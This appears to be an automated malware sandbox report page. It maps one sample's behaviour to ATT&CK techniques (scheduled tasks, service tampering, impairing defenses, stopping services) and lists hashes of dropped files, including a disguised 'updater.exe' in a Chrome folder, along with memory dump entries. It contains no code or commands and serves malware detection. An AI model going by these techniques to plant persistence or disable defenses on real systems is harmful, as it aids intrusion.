MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
443B

MD5
8add56521ef894ef0c66ecd3e989d718

SHA1
2058aa5185fd5dcce7263bef8fe35bf5e12dbc7f

SHA256
01bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724

SHA512
af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
memory/404-165-0x0000000000000000-mapping.dmp

Download
memory/868-189-0x0000000000000000-mapping.dmp

Download
memory/1004-204-0x0000000000000000-mapping.dmp

Download
memory/1148-140-0x0000000000000000-mapping.dmp

Download
memory/1244-203-0x0000000000000000-mapping.dmp

Download
memory/1276-175-0x0000000000000000-mapping.dmp

Download
memory/1380-198-0x0000000000000000-mapping.dmp

Download
memory/1388-149-0x0000000000000000-mapping.dmp

Download
memory/1404-162-0x0000000000000000-mapping.dmp

Download
memory/1508-146-0x0000000000000000-mapping.dmp

Download
memory/1564-163-0x0000000000000000-mapping.dmp

Download
memory/1592-197-0x0000000000000000-mapping.dmp

Download
memory/1700-132-0x0000000000000000-mapping.dmp

Download
memory/1864-141-0x0000000000000000-mapping.dmp

Download
memory/1980-171-0x0000000000000000-mapping.dmp

Download
memory/1988-173-0x0000000000000000-mapping.dmp

Download
memory/2152-166-0x0000000000000000-mapping.dmp

Download
memory/2176-180-0x0000000000000000-mapping.dmp

Download
memory/2364-153-0x0000000000000000-mapping.dmp

Download
memory/2392-155-0x0000000000000000-mapping.dmp

Download
memory/2496-154-0x0000000000000000-mapping.dmp

Download
memory/2664-156-0x0000000000000000-mapping.dmp

Download
memory/2748-164-0x0000000000000000-mapping.dmp

Download
memory/2808-172-0x0000000000000000-mapping.dmp

Download
memory/2920-188-0x0000000000000000-mapping.dmp

Download
memory/2940-168-0x0000000000000000-mapping.dmp

Download
memory/2968-190-0x0000000000000000-mapping.dmp

Download
memory/3008-210-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/3008-213-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/3008-209-0x000000014036DAD4-mapping.dmp

Download
memory/3008-212-0x00000000027C0000-0x00000000027E0000-memory.dmp

Filesize
128KB

Download
memory/3008-214-0x00000000131C0000-0x0000000013200000-memory.dmp

Filesize
256KB

Download
memory/3008-208-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/3008-211-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/3052-139-0x0000000000000000-mapping.dmp

Download
memory/3136-194-0x0000000000401BEA-mapping.dmp

Download
memory/3136-193-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/3136-196-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/3188-144-0x0000000000000000-mapping.dmp

Download
memory/3296-167-0x0000000000000000-mapping.dmp

Download
memory/3312-192-0x0000000000000000-mapping.dmp

Download
memory/3352-150-0x0000000000000000-mapping.dmp

Download
memory/3420-201-0x0000000000000000-mapping.dmp

Download
memory/3424-179-0x00007FFE0F180000-0x00007FFE0FC41000-memory.dmp

Filesize
10.8MB

Download
memory/3424-199-0x00000235A1530000-0x00000235A1542000-memory.dmp

Filesize
72KB

Download
memory/3524-200-0x0000000000000000-mapping.dmp

Download
memory/3552-169-0x0000000000000000-mapping.dmp

Download
memory/3576-181-0x0000000000000000-mapping.dmp

Download
memory/3576-184-0x00007FFE0F180000-0x00007FFE0FC41000-memory.dmp

Filesize
10.8MB

Download
memory/3664-142-0x0000000000000000-mapping.dmp

Download
memory/3872-157-0x0000000000000000-mapping.dmp

Download
memory/3988-130-0x000001E980000000-0x000001E98043E000-memory.dmp

Filesize
4.2MB

Download
memory/3988-131-0x00007FFE0DD30000-0x00007FFE0E7F1000-memory.dmp

Filesize
10.8MB

Download
memory/4120-207-0x0000000000000000-mapping.dmp

Download
memory/4136-148-0x0000000000000000-mapping.dmp

Download
memory/4144-151-0x0000000000000000-mapping.dmp

Download
memory/4196-186-0x0000000000000000-mapping.dmp

Download
memory/4228-170-0x0000000000000000-mapping.dmp

Download
memory/4312-185-0x0000000000000000-mapping.dmp

Download
memory/4392-145-0x0000000000000000-mapping.dmp

Download
memory/4400-159-0x0000000000000000-mapping.dmp

Download
memory/4408-143-0x0000000000000000-mapping.dmp

Download
memory/4460-202-0x0000000000000000-mapping.dmp

Download
memory/4468-191-0x0000000000000000-mapping.dmp

Download
memory/4476-136-0x0000000000000000-mapping.dmp

Download
memory/4512-187-0x0000000000000000-mapping.dmp

Download
memory/4536-137-0x0000000000000000-mapping.dmp

Download
memory/4540-152-0x0000000000000000-mapping.dmp

Download
memory/4572-205-0x0000000000000000-mapping.dmp

Download
memory/4740-158-0x0000000000000000-mapping.dmp

Download
memory/4760-206-0x0000000000000000-mapping.dmp

Download
memory/4768-161-0x0000000000000000-mapping.dmp

Download
memory/4804-174-0x0000000000000000-mapping.dmp

Download
memory/4892-135-0x00007FFE0DD30000-0x00007FFE0E7F1000-memory.dmp

Filesize
10.8MB

Download
memory/4892-134-0x00000157FBE90000-0x00000157FBEB2000-memory.dmp

Filesize
136KB

Download
memory/4892-133-0x0000000000000000-mapping.dmp

Download
memory/5000-160-0x0000000000000000-mapping.dmp

Download
memory/5004-147-0x0000000000000000-mapping.dmp

Download
memory/5044-138-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads